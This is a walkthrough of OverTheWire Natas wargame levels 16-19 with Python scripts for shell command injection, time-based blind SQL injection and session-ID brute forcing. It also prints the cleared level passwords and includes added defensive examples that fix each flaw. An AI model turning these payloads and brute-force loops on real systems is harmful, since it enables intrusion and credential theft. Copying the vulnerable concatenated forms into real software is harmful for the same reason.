Wargames NATAS (16-19) problem solving essays
2022-07-24 08:26:00 【renu08】
Natas Level 15 → Level 16
Tip: in a shell script, `$()` executes a nested command even inside double quotes, so one grep can be built inside another, for example:

```shell
grep -i "$(grep ^pwd password.txt)worng" dictionary.txt
```

The program first runs the sub-shell, which looks for the string `pwd` at the start of a line in password.txt. If it finds nothing, the substitution is empty and the outer command is equivalent to `grep -i worng dictionary.txt`, which searches dictionary.txt for `worng` and prints that line. Conversely, if the inner grep does find a match, the outer grep searches for `<matched line>worng`, which is not in the dictionary, so nothing is printed. That difference in output is the oracle we can use to brute-force the password one character at a time. I again implemented it in Python:
```python
import urllib.request
import urllib.parse
import re

url = 'http://natas16.natas.labs.overthewire.org'
headers = {
    'Host': 'natas16.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas16.natas.labs.overthewire.org/?needle=accounts&submit=Search',
    'Cookie': '__utma=176859643.1665848136.1639378791.1640070651.1640436097.15; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}
# characters a Natas password can consist of
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
# inner grep: matches only if the password starts with the prefix guessed so far
n1 = '$(grep ^'
n2 = ' /etc/natas_webpass/natas17)accounts'
# Natas passwords are 32 characters long
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
# "accounts" is echoed back only when the inner grep found nothing
pattern = re.compile(r'\naccounts')
pwd = ''
values = {
    'needle': '',
    'submit': 'Search'
}
for i in range(length):
    for ch in dic:
        needle = n1 + pwd + ch + n2
        print(needle)
        values['needle'] = needle
        data = urllib.parse.urlencode(values)
        r = url + '?' + data
        req = urllib.request.Request(url=r, headers=headers, method='GET')
        response = urllib.request.urlopen(req)
        html = response.read().decode('ascii')
        if pattern.search(html):
            # "accounts" came back: the inner grep matched nothing, wrong character
            continue
        else:
            # nothing came back: the inner grep matched, this character is correct
            pwd += ch
            break
print(pwd)
```
username: natas17
password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
Level cleared!
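To make the root cause of this level concrete from the defender's side, here is an added example (not from the original post and not the Natas PHP source) that puts the shell-interpolated grep from the tip next to a form that never hands the needle to a shell; the dictionary lines and the `$(echo)` probe are constructed:

```python
import os
import re
import subprocess
import tempfile

# Allowlist: dictionary words only contain letters and digits (the same set the brute
# force above iterates over), so anything else is rejected before any command runs.
ALLOWED = re.compile(r'[A-Za-z0-9]{1,64}')


def is_safe_needle(needle: str) -> bool:
    return ALLOWED.fullmatch(needle) is not None


def shell_command(needle: str, path: str = 'dictionary.txt') -> str:
    """Vulnerable form: inside double quotes the shell still expands $(...),
    so the nested command runs before grep ever sees the needle."""
    return 'grep -i "' + needle + '" ' + path


def argv_command(needle: str, path: str = 'dictionary.txt') -> list:
    """Hardened form: no shell is involved, the needle is one argv element, and
    '--' stops a needle beginning with '-' from being parsed as a grep option."""
    return ['grep', '-i', '--', needle, path]


def run_both(needle: str) -> tuple:
    """Run both forms against a constructed dictionary and return
    (shell_output, argv_output). Needs sh and grep on PATH."""
    with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as f:
        f.write('accounts\nafrican\nafricans\n')  # constructed sample lines
        path = f.name
    try:
        shell_out = subprocess.run(shell_command(needle, path), shell=True,
                                   capture_output=True, text=True).stdout
        argv_out = subprocess.run(argv_command(needle, path),
                                  capture_output=True, text=True).stdout
    finally:
        os.unlink(path)
    return shell_out, argv_out


if __name__ == '__main__':
    # '$(echo)' collapses to nothing under a shell, exactly like an inner grep
    # that matches no line: the shell form then searches for "accounts" and
    # prints it, while the argv form searches for the literal text and prints nothing.
    print(run_both('accounts'))
    print(run_both('$(echo)accounts'))
```

The allowlist alone would already block every needle the script above sends, but the argv form is the fix that holds even when the allowlist is wrong.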
Natas Level 16 → Level 17
Tip: opening the source code and comparing it with the previous level, the difference is that the output is commented out. For injection against a MySQL database there are generally three directions:
- Echo-based injection: the server returns some information
- Time-based blind injection: the server returns nothing, but a cleverly constructed SQL statement lets you infer information from the server's response time
- Error-based injection (omitted here)
The previous level was echo-based injection; this one is time-based blind injection.
I wrote a Python script for it; the code is as follows:
```python
import requests

url = 'http://natas17.natas.labs.overthewire.org/index.php'
headers = {
    'Host': 'natas17.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://natas17.natas.labs.overthewire.org',
    'Authorization': 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas17.natas.labs.overthewire.org/',
    'Cookie': '__utma=176859643.1665848136.1639378791.1640436097.1640518734.16; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
# payload: close the username string, then sleep only if the password starts with
# the guessed prefix (BINARY makes LIKE case-sensitive); '#' comments out the rest
n1 = 'natas18" AND BINARY password LIKE "'
n2 = '%" AND SLEEP(10)#'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pwd = ''
for i in range(length):
    for ch in dic:
        name = n1 + pwd + ch + n2
        print(name)
        data = {'username': name}
        res = requests.post(url, data=data, headers=headers)
        elapsed = res.elapsed.total_seconds()
        print(elapsed)
        if elapsed > 10:
            # the server slept, so the prefix including this character is correct
            pwd += ch
            break
print(pwd)
```
username: natas18
password: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
Note: because of network latency it is better to use a longer delay; I used 10 seconds here, SLEEP(10), otherwise the results come out wrong.
Level cleared!
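The whole level exists because the username is concatenated into the SQL string. As an added example (not from the original post, not the Natas source), the following puts that construction next to a parameterized query, using an in-memory SQLite table with a constructed sample password. SQLite has no SLEEP(), so the probe is the boolean variant of the page's prefix payload with single quotes and `--` instead of `#`:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table; the password is a sample, not a Natas value."""
    con = sqlite3.connect(':memory:')
    con.execute('CREATE TABLE users (username TEXT, password TEXT)')
    con.execute("INSERT INTO users VALUES ('natas18', 'SamplePw0')")
    return con


def user_exists_vulnerable(con: sqlite3.Connection, username: str) -> bool:
    # String concatenation: the untrusted value becomes part of the SQL grammar,
    # so a quote in it ends the literal and the rest is executed as SQL.
    sql = "SELECT 1 FROM users WHERE username='" + username + "'"
    return con.execute(sql).fetchone() is not None


def user_exists_safe(con: sqlite3.Connection, username: str) -> bool:
    # Parameter binding: the value is passed separately from the statement and
    # can only ever be compared as data, never parsed as SQL.
    sql = 'SELECT 1 FROM users WHERE username=?'
    return con.execute(sql, (username,)).fetchone() is not None


def prefix_probe(prefix: str) -> str:
    """Boolean form of the page's payload: true only if the stored password
    starts with `prefix` (case-insensitively here, hence BINARY on MySQL)."""
    return "natas18' AND password LIKE '" + prefix + "%'--"


def leaks_prefix(check, prefix: str) -> bool:
    """Does `check` answer differently for a right and a wrong prefix guess?"""
    con = make_db()
    return check(con, prefix_probe(prefix)) != check(con, prefix_probe('#'))
```

`leaks_prefix(user_exists_vulnerable, 'S')` is True: the concatenated query is an oracle for the password, which is exactly what the timing script exploits. `leaks_prefix(user_exists_safe, 'S')` is False: with binding, the probe is just a username that does not exist.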
Natas Level 17 → Level 18
Tip: after reading the source code I found that the password is only shown when logged in as administrator, and the identity information is stored in the $_SESSION variable, so an administrator login can be obtained by session hijacking. Session hijacking needs the session_id; once we have it we can log in as administrator. So the job now is to get the session_id. Capturing the request with Burp (bp) shows a cookie field PHPSESSID, which is what the server uses to tell users apart, so we only need the administrator's PHPSESSID value to log in as administrator.
The PHPSESSID value turns out to be a plain number, and the source code contains $maxid=640, meaning the largest session_id is 640. So we just brute-force it directly; the Python code is as follows:
```python
import requests
import re

url = 'http://natas18.natas.labs.overthewire.org/'
headers = {
    'Host': 'natas18.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are logged in as a regular user')
# $maxid = 640 in the source, so session ids run from 1 to 640 inclusive
for i in range(1, 641):
    val = str(i)
    cookies = {'PHPSESSID': val}
    res = requests.get(url, headers=headers, cookies=cookies)
    if pattern.search(res.text):
        print(val)
    else:
        # anything other than the regular-user message means this is the admin session
        print('session_id=' + val)
        print(res.text)
        break
```
Running the script finds the administrator's session_id=119, and on to the next level.
username: natas19
password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
Level cleared!
Natas Level 18 → Level 19
Tip: the source code of this level is the same as the previous one, but this time PHPSESSID is not a plain number. After a few tries the pattern emerges: the first 7 characters of PHPSESSID are digits of the form 3xxxxxx, so brute-forcing starts at 3000000, and the trailing characters are the fixed string 'd61646d696e'. Then it is the same direct brute force as above. It takes a while, so have a cup of coffee. The code is as follows:
```python
import requests
import re

url = 'http://natas19.natas.labs.overthewire.org/index.php'
headers = {
    'Host': 'natas19.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are an admin')
# PHPSESSID starts with 7 digits; the admin's first 7 turned out to be 3238312
s_val = 3000000
while s_val <= 9999999:  # stop after the last 7-digit prefix instead of looping forever
    session_id = str(s_val) + 'd61646d696e'
    print('PHPSESSID: ' + session_id)
    cookies = {'PHPSESSID': session_id}
    res = requests.get(url, headers=headers, cookies=cookies)
    if pattern.search(res.text):
        print('session_id=' + session_id)
        print(res.text)
        break
    s_val += 1
```
After running the script, session_id=3238312d61646d696e turns out to be the administrator's session_id.
username: natas20
password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
Level cleared!
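Levels 18 and 19 are both the same weakness: a session id drawn from a tiny, structured space. As an added example (not from the original post), the following decodes the hex layout observed above to show what the "7 digits plus fixed suffix" actually is, measures the keyspace of both levels, and contrasts it with an id from the OS CSPRNG; the helper names are mine:

```python
import binascii
import math
import re
import secrets

# Level 18: a plain number 1..640. Level 19: the same number and the username,
# joined with '-', hex-encoded. The suffix the page brute-forced around is the
# tail of hex('-admin'); the leading 7 digits are hex('281') plus the '2' of '2d'.
STRUCTURED = re.compile(r'\d+-[A-Za-z0-9_]+')


def decode_session_id(session_id: str) -> tuple:
    """hex('<n>-<user>') -> (n, user); raises ValueError on anything else."""
    raw = binascii.unhexlify(session_id).decode('ascii')
    number, sep, user = raw.partition('-')
    if sep != '-' or not number.isdigit():
        raise ValueError('not a <number>-<user> session id')
    return int(number), user


def encode_session_id(number: int, user: str) -> str:
    return binascii.hexlify(f'{number}-{user}'.encode('ascii')).decode('ascii')


def looks_structured(session_id: str) -> bool:
    """True when the cookie decodes to the predictable <number>-<user> layout."""
    try:
        raw = binascii.unhexlify(session_id).decode('ascii')
    except (ValueError, UnicodeDecodeError):
        return False
    return STRUCTURED.fullmatch(raw) is not None


def effective_bits(max_id: int) -> float:
    """Entropy of an id drawn uniformly from 1..max_id, in bits."""
    return math.log2(max_id)


def fresh_session_id(nbytes: int = 16) -> str:
    """What the cookie should be: 128 bits from the OS CSPRNG, not enumerable."""
    return secrets.token_hex(nbytes)
```

Because the username is part of the level-19 id, the attacker only has to guess the number, so the hex encoding adds no security at all: both levels have about 9.3 bits of entropy against the 128 of `fresh_session_id()`.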